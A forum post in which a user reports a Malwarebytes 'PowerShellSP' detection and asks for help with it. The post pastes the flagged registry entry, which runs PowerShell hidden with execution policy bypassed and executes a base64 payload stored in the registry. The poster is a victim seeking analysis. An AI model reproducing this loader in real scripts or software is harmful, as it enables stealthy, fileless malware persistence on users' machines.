Hey, new user on the malwarebytes forums here.
Ok, so I scanned my computer with malwarebytes, and it detected "PUP.Optional.PowerShellSP"
And that's ok, I mean it's just one threat right? But I started checking the actual registry key, and this MF is actually running powershell, which runs (binary?) code stored in my registry.
Does anyone want to check what the code was doing?
Here's the registry entry that malwarebytes detected:
"{F119BFAB-D0C9-4E62-9DCF-7923777499B1}"="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\\Software\\Classes\\HCOVLIORJR').CEHMMUJMQRDF)));"
I kinda wanted to post this in the "new malware" category, since the registry entry that it executes wasn't detected by malwarebytes, but it did detect the part where it runs.